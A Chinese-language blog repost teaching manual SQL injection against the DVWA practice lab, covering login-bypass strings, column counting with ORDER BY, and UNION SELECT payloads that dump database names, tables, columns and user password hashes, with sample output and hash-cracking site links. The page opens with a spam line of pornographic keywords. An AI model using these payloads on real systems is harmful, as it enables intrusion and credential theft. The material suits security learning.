国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

SQL手工注入

這篇具有很好參考價值的文章主要介紹了SQL手工注入。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

兩要素

  • 用戶能夠控制輸入的內(nèi)容
  • web應用把用戶輸入的內(nèi)容,在沒有經(jīng)過過濾或者嚴格過濾的情況下帶入到數(shù)據(jù)庫中執(zhí)行

分類

  • GET和POST
  • 整數(shù)型,字符型,搜索型

萬能密碼

’1 or 1 = 1#
1 or 1 = 1#

注釋符:

  • -- (后面有空格)
  • --+
  • %23

注入流程:

  • 判斷是否有注入信息
  • 獲取數(shù)據(jù)庫基本信息
  • 獲取數(shù)據(jù)庫名
  • 獲取表名
  • 獲取列名
  • 獲取用戶數(shù)據(jù)
  • 破解加密數(shù)據(jù)
  • 提權(quán)
  • 內(nèi)網(wǎng)滲透

判斷是否存在注入,判斷注入類型-第一步

1 or 1 = 1#
1' or 1 = 1#

注:
get傳參方式中大概率存在url編碼
%20-->空格
%23--> 井號
%3d-->等號
加號可以代替空格

union select 注入-第二步

1' order by 1 -- 
1' order by 2 -- 
1' or 1 = 1 order by n -- 

判斷列數(shù)可以使用二分法
假如只有兩列,order by 3,那么就會報錯-->用于判斷列數(shù)

union:聯(lián)合,合并。將多條查詢語句的結(jié)果合并成一個結(jié)果

要求:

  • 多條查詢語句的查詢列數(shù)是一致的
  • union關(guān)鍵字默認去重,如果使用union all可以包含重復項

union聯(lián)合注入-第三步

獲取數(shù)據(jù)庫中的信息:判斷顯示位

1' union select 1,2-- 

這里使用-1使union之前的語句查詢無結(jié)果,則顯示的時候就會顯示union之后的第二條語句

DVWA:

ID: 1' union select 1,2 #  
First name: admin  
Surname: admin

ID: 1' union select 1,2 #  
First name: 1 #顯示位1
Surname: 2 #顯示位2

union聯(lián)合注入-第四步

獲取數(shù)據(jù)庫中的信息:用戶、版本、數(shù)據(jù)庫名

1' union select version(),user()#

常用函數(shù):
user()返回當前使用數(shù)據(jù)庫的用戶
version()返回當前數(shù)據(jù)庫版本
database()返回當前使用的數(shù)據(jù)庫版本

DVWA

1' union select database(),user()#

ID: 1' union select database(),user()#  
First name: admin  
Surname: admin

ID: 1' union select database(),user()#  
First name: dvwa  #數(shù)據(jù)庫名
Surname: root@localhost  #用戶名

union聯(lián)合注入-第五步

獲取數(shù)據(jù)庫信息:

  • SCHEMATA表:當前MYsql中所有數(shù)據(jù)庫的信息。show databases命令:命令從這個表獲取數(shù)據(jù)
  • TABALES表:存儲數(shù)據(jù)庫中的表信息(包括視圖),包括表屬于哪個數(shù)據(jù)庫,表的類型,存儲引擎,創(chuàng)建時間等信息。show tables from database命令:從這個表獲取結(jié)果
  • COLUMNS表:存儲表中的列信息,包括表有多少列,每個列的類型等。show columns from tablename命令,從這個表獲取結(jié)果

mysql中的user表中有兩列:user,password兩列中存在登錄數(shù)據(jù)庫的用戶名和密碼

查詢庫名

1' union select 1,schema_name from information_schema.schemata

# 查詢information_schema庫中的schemeta表

SQL手工注入
DVWA

ID: 1' union select 1,schema_name from information_schema.schemata#  
First name: admin  
Surname: admin

ID: 1' union select 1,schema_name from information_schema.schemata#  
First name: 1  
Surname: information_schema

ID: 1' union select 1,schema_name from information_schema.schemata#  
First name: 1  
Surname: challenges

ID: 1' union select 1,schema_name from information_schema.schemata#  
First name: 1  
Surname: dvwa

ID: 1' union select 1,schema_name from information_schema.schemata#  
First name: 1  
Surname: mysql

ID: 1' union select 1,schema_name from information_schema.schemata#  
First name: 1  
Surname: performance_schema

ID: 1' union select 1,schema_name from information_schema.schemata#  
First name: 1  
Surname: security

ID: 1' union select 1,schema_name from information_schema.schemata#  
First name: 1  
Surname: test

查詢表名

1' union select 1,table_name from information_schema.tables where table_schema = database()#
這一步可以跳過庫查詢

1' union select 1,table_name from information_schema.tables where table_schema = 'dvwa'#

SQL手工注入

DVWA

ID: 1' union select 1,table_name from information_schema.tables where table_schema = 'dvwa'#  
First name: admin  
Surname: admin

ID: 1' union select 1,table_name from information_schema.tables where table_schema = 'dvwa'#  
First name: 1  
Surname: guestbook

ID: 1' union select 1,table_name from information_schema.tables where table_schema = 'dvwa'#  
First name: 1  
Surname: users

查詢列名

1' union select 1,column_name from information_schema.columns where table_name = 'users' and table_schema = 'dvwa' #

1' union select 1,column_name from information_schema.columns where table_name = 'users' and table_schema = database() #

SQL手工注入

DVWA

ID: 1' union select 1,column_name from information_schema.columns where table_name = 'users' and table_schema = 'dvwa' #  
First name: admin  
Surname: admin

ID: 1' union select 1,column_name from information_schema.columns where table_name = 'users' and table_schema = 'dvwa' #  
First name: 1  
Surname: user_id

ID: 1' union select 1,column_name from information_schema.columns where table_name = 'users' and table_schema = 'dvwa' #  
First name: 1  
Surname: first_name

ID: 1' union select 1,column_name from information_schema.columns where table_name = 'users' and table_schema = 'dvwa' #  
First name: 1  
Surname: last_name

ID: 1' union select 1,column_name from information_schema.columns where table_name = 'users' and table_schema = 'dvwa' #  
First name: 1  
Surname: user

ID: 1' union select 1,column_name from information_schema.columns where table_name = 'users' and table_schema = 'dvwa' #  
First name: 1  
Surname: password

ID: 1' union select 1,column_name from information_schema.columns where table_name = 'users' and table_schema = 'dvwa' #  
First name: 1  
Surname: avatar

ID: 1' union select 1,column_name from information_schema.columns where table_name = 'users' and table_schema = 'dvwa' #  
First name: 1  
Surname: last_login

ID: 1' union select 1,column_name from information_schema.columns where table_name = 'users' and table_schema = 'dvwa' #  
First name: 1  
Surname: failed_login

查詢數(shù)據(jù)(利用列名、表名)

1' union select user,password from users #

DVWA

ID: 1' union select user,password from users #  
First name: admin  
Surname: admin

ID: 1' union select user,password from users #  
First name: admin  
Surname: 5f4dcc3b5aa765d61d8327deb882cf99

ID: 1' union select user,password from users #  
First name: gordonb  
Surname: e99a18c428cb38d5f260853678922e03

ID: 1' union select user,password from users #  
First name: 1337  
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b

ID: 1' union select user,password from users #  
First name: pablo  
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7

ID: 1' union select user,password from users #  
First name: smithy  
Surname: 5f4dcc3b5aa765d61d8327deb882cf99

union聯(lián)合注入

字符串拼接
常用函數(shù):

concat():將多個字符連接成一個字符串拼接
select concat('M','y','S','Q','L')

concat_ws():將多個字符串連接成一個字符串,但可以指定分隔符
select concat_ws('_','M','y','S','Q','L')

group_concat():將多行結(jié)果連在一起
select group_concat(user)from user;

DVWA

ID: 1' union select 1,concat_ws('_',user,password) from users #  
First name: admin  
Surname: admin

ID: 1' union select 1,concat_ws('_',user,password) from users #  
First name: 1  
Surname: admin_5f4dcc3b5aa765d61d8327deb882cf99

ID: 1' union select 1,concat_ws('_',user,password) from users #  
First name: 1  
Surname: gordonb_e99a18c428cb38d5f260853678922e03

ID: 1' union select 1,concat_ws('_',user,password) from users #  
First name: 1  
Surname: 1337_8d3533d75ae2c3966d7e0d4fcc69216b

ID: 1' union select 1,concat_ws('_',user,password) from users #  
First name: 1  
Surname: pablo_0d107d09f5bbe40cade3de5c71e9e9b7

ID: 1' union select 1,concat_ws('_',user,password) from users #  
First name: 1  
Surname: smithy_5f4dcc3b5aa765d61d8327deb882cf99

解密-第六步

https://cmd5.com/
https://www.somd5.com/
數(shù)據(jù)庫自己的賬號密碼加密是mysql5的加密方式文章來源地址http://www.zghlxwxcb.cn/news/detail-825174.html

到了這里,關(guān)于SQL手工注入的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權(quán),不承擔相關(guān)法律責任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務器費用

相關(guān)文章

  • Web安全 SQL注入漏洞測試.(可以 防止惡意用戶利用漏洞)

    Web安全 SQL注入漏洞測試.(可以 防止惡意用戶利用漏洞)

    SQL注入就是 有些 惡意用戶在提交查詢請求的過程中 將SQL語句插入到請求內(nèi)容 中,同時程序的本身對用戶輸入的內(nèi)容過于相信, 沒有對用戶插入的SQL語句進行任何的過濾 ,從而 直接被SQL語句直接被服務端執(zhí)行 ,導致數(shù)據(jù)庫的原有信息泄露,篡改,甚至被刪除等風險。 SQL注

    2023年04月20日
    瀏覽(25)
  • 達夢數(shù)據(jù)庫手工注入筆記

    前言 隨著信創(chuàng)產(chǎn)業(yè)的逐步普及,很多小伙伴在滲透實戰(zhàn)時會越來越多的遇到國產(chǎn)化數(shù)據(jù)庫,如達夢、人大金倉等。如果使用該類數(shù)據(jù)庫的站點存在sql注入漏洞,用sqlmap等工具無法支持我們直接得到想要的數(shù)據(jù),我們需要理解這些數(shù)據(jù)庫的語法才能更好的進行手工注入。本文總

    2024年02月16日
    瀏覽(25)
  • MySQL安全性:用戶認證、防范SQL注入和SSL/TLS配置詳解

    MySQL作為廣泛使用的關(guān)系型數(shù)據(jù)庫管理系統(tǒng),安全性至關(guān)重要。在本篇技術(shù)博客中,我們將深入探討MySQL的用戶認證方式、防范SQL注入攻擊的方法以及SSL/TLS加密的配置。 MySQL支持多種用戶認證方式,其中兩種常見方式是caching_sha2_password和mysql_native_password。 1.1 caching_sha2_passwor

    2024年02月02日
    瀏覽(23)
  • vue 控制用戶只能輸入正整數(shù)的方法

    經(jīng)過一番查找,找到一個能使用的方法 在行內(nèi)添加正則控制,如下所示: 這個方法確實能達到想要的效果,所有非正整數(shù)的內(nèi)容都無法輸入。但是在測試中發(fā)現(xiàn),這個辦法會時不時的與v-model綁定斷開,造成功能無法使用。 ?所以我在這個方法的思路上進行了改造,改成了下

    2024年02月15日
    瀏覽(18)
  • 網(wǎng)絡(luò)安全進階學習第十課——MySQL手工注入

    網(wǎng)絡(luò)安全進階學習第十課——MySQL手工注入

    重點庫: information_schema PHP的網(wǎng)站,常用數(shù)據(jù)庫為MYSQL、PostgreSQL 判斷數(shù)據(jù)庫類型: MYSQL:3306 PostgreSQL:5432 MSSQL:1433 使用場景:數(shù)據(jù)庫在頁面中存在顯示位。 UNION操作符 用于連接兩個以上的SELECT語句的結(jié)果組合到一個結(jié)果集合中。前提是兩個select必有 相同列 。 1)首先判斷

    2024年02月10日
    瀏覽(29)
  • 網(wǎng)絡(luò)安全進階學習第十一課——MySQL手工注入(2)

    網(wǎng)絡(luò)安全進階學習第十一課——MySQL手工注入(2)

    UA是 用戶代理(User-Agent) 的縮寫,里面含有客戶使用的操作系統(tǒng)及版本、CPU 類型、瀏覽器及版本、瀏覽器渲染引擎、瀏覽器語言、瀏覽器插件等。 一些網(wǎng)站常常通過判斷 UA 來給不同的操作系統(tǒng)、不同的瀏覽器發(fā)送不同的頁面,因此可能造成某些頁面無法在某個瀏覽器中正

    2024年02月14日
    瀏覽(30)
  • “構(gòu)建安全高效的前端權(quán)限控制系統(tǒng):確保用戶訪問合適的內(nèi)容“

    目錄 引言 一、背景介紹 二 、具體實現(xiàn)方法 (1)用戶角色管理 1. 安裝依賴 2. 創(chuàng)建數(shù)據(jù)模型 3. 創(chuàng)建控制器 4. 創(chuàng)建路由 5. 配置應用程序 6. 測試接口 (2)前端路由控制 1. 安裝Vue Router 2. 創(chuàng)建路由配置 3. 創(chuàng)建視圖組件 4. 配置路由 5. 測試路由控制 (3) 頁面元素展示控制 1. 創(chuàng)

    2024年02月19日
    瀏覽(27)
  • MySQL數(shù)據(jù)庫——SQL(4)-DCL(管理用戶、權(quán)限控制)

    MySQL數(shù)據(jù)庫——SQL(4)-DCL(管理用戶、權(quán)限控制)

    目錄 管理用戶 1.查詢用戶 2.創(chuàng)建用戶 3.修改用戶密碼 4.刪除用戶 示例 權(quán)限控制 1.查詢權(quán)限 2.授予權(quán)限 3.撤銷權(quán)限 示例 DCL總結(jié) DCL DCL英文全稱是Data Control Language(數(shù)據(jù)控制語言),用來管理數(shù)據(jù)庫用戶、控制數(shù)據(jù)庫的訪問權(quán)限。 注意: 主機名可以使用通配符‘%’。 這類S

    2024年02月12日
    瀏覽(48)
  • html-dom核心內(nèi)容--四要素

    html-dom核心內(nèi)容--四要素

    1·、結(jié)構(gòu) HTML DOM (文檔對象模型) 當網(wǎng)頁被加載時,瀏覽器會創(chuàng)建頁面的文檔對象模型(Document Object Model)。? 2、核心關(guān)注的內(nèi)容:“ 元素” ,“ 屬性” ,“ 修改樣式 ”,“ 事件反應” 。==四要素 JavaScript 能夠改變頁面中的所有 HTML 元素 JavaScript 能夠改變頁面中的所有

    2024年02月11日
    瀏覽(20)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包